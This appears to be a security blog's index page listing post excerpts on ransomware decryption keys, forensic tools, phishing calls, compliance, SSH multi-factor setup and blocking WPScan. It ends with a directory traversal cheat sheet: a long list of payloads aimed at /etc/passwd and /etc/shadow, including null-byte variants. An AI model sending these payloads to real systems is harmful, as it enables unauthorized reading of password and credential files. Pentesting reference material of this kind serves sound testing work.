When it comes to security consulting, a lot of times I will see the most ridiculous requests. A lot of times there will be unethical requests that ask me to perform a back-hack (perform an attack on a target who has hacked my client). Which I would never do for a number of reasons but... Continue Reading →
The war is over! | Decryption keys to the Crysis ransomware released
Crysis ransomware master keys have officially been posted to Pastebin. If you haven’t already deleted files that crooks encrypted with the Crysis ransomware, you’re in luck. These keys can also be used to decrypt files encrypted with .wallet and .onion extensions. A member of BleepingComputer.com forums named lightsentinelone has posted a Pastebin link that leads to... Continue Reading →
Autopsy 4.4 is released!
The new version of our favorite open source forensic tool – Autopsy, – has been released. New triage features. Make a VHD image during analysis. Pre-program files to analyze… Version 4.4.0 can be downloaded here.
Back-Hacking your Identity | Phishing over VOIP
DESCRIPTION: Spam calls have been rapidly striking my phone recently. It's insane how far people are willing to go for a few bucks. How much time they're willing to waste to sit in a call center and call people who want nothing to do with them. As a security consultant, this got my thinking, what... Continue Reading →
PCI, HIPAA, ISO and YOU | Vulnerabilities within frameworks.
There’s something that I see often and that is a lot of businesses who abide by security frameworks such as PCI assume they are not vulnerable. Take a look at Sony or Home Depot or any industry that has been attacked recently or a few years ago. Do you really think they can’t afford to have […]
Getting past the firewall | Kerberos
Nowadays, almost all networks have firewalls installed to protect them from the dangers of the un-trusted outside world of the Internet. When firewalls first came to the scene, they were nowhere near good enough to protect the Network completely. However, with the passage of time, the quality of firewalls has increased to such a level... Continue Reading →
Blocking the scanners | WPScan
Description: What is WPScan? WPScan is an automated scanner that is used to identify vulnerabilities within WordPress websites. Information such as plugin versions, directory, user names, user agents and much more through this powerful tool. The following are methods to block WPscan from gathering information from your website such as directories, users names, user agents... Continue Reading →
Penetration Testing Resource List
A collection of awesome penetration testing resources Online Resources Penetration Testing Resources Metasploit Unleashed - Free Offensive Security Metasploit course PTES - Penetration Testing Execution Standard OWASP - Open Web Application Security Project PENTEST-WIKI - A free online security knowledge library for pen testers/researchers. Vulnerability Assessment Framework - Penetration Testing Framework. XSS-Payloads - Ultimate resource... Continue Reading →
Protecting your Ubuntu Server | Setting up Multi-Factor Authentication for SSH
An authentication factor is a single piece of information used to prove you have the rights to perform an action, like logging into a system. An authentication channel is a way an authentication system delivers a factor to the user or requires the user to reply. Passwords and security tokens are examples of authentication factors;... Continue Reading →
Directory Traversal | Cheat Sheet
/etc/master.passwd /master.passwd etc/passwd etc/shadow%00 /etc/passwd /etc/passwd%00 ../etc/passwd ../etc/passwd%00 ../../etc/passwd ../../etc/passwd%00 ../../../etc/passwd ../../../etc/passwd%00 ../../../../etc/passwd ../../../../etc/passwd%00 ../../../../../etc/passwd ../../../../../etc/passwd%00 ../../../../../../etc/passwd ../../../../../../etc/passwd%00 ../../../../../../../etc/passwd ../../../../../../../etc/passwd%00 ../../../../../../../../etc/passwd ../../../../../../../../etc/passwd%00 ../../../../../../../../../etc/passwd ../../../../../../../../../etc/passwd%00 ../../../../../../../../../../etc/passwd ../../../../../../../../../../etc/passwd%00 ../../../../../../../../../../../etc/passwd ../../../../../../../../../../../etc/passwd%00 ../../../../../../../../../../../../etc/passwd ../../../../../../../../../../../../etc/passwd%00 ../../../../../../../../../../../../../etc/passwd ../../../../../../../../../../../../../etc/passwd%00 ../../../../../../../../../../../../../../etc/passwd ../../../../../../../../../../../../../../etc/passwd%00 ../../../../../../../../../../../../../../../etc/passwd ../../../../../../../../../../../../../../../etc/passwd%00 ../../../../../../../../../../../../../../../../etc/passwd ../../../../../../../../../../../../../../../../etc/passwd%00 ../../../../../../../../../../../../../../../../../etc/passwd ../../../../../../../../../../../../../../../../../etc/passwd%00 ../../../../../../../../../../../../../../../../../../etc/passwd ../../../../../../../../../../../../../../../../../../etc/passwd%00 ../../../../../../../../../../../../../../../../../../../etc/passwd ../../../../../../../../../../../../../../../../../../../etc/passwd%00 ../../../../../../../../../../../../../../../../../../../../etc/passwd ../../../../../../../../../../../../../../../../../../../../etc/passwd%00 ../../../../../../../../../../../../../../../../../../../../../etc/passwd ../../../../../../../../../../../../../../../../../../../../../etc/passwd%00 ../../../../../../../../../../../../../../../../../../../../../../etc/passwd ../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00 ../../../../../../../../../../../../../../../../../../../../../../etc/shadow%00 ———————————————————————————————————————————- ../../../../../../etc/passwd&=%3C%3C%3C%3C ../../../administrator/inbox ../../../../../../../dev... Continue Reading →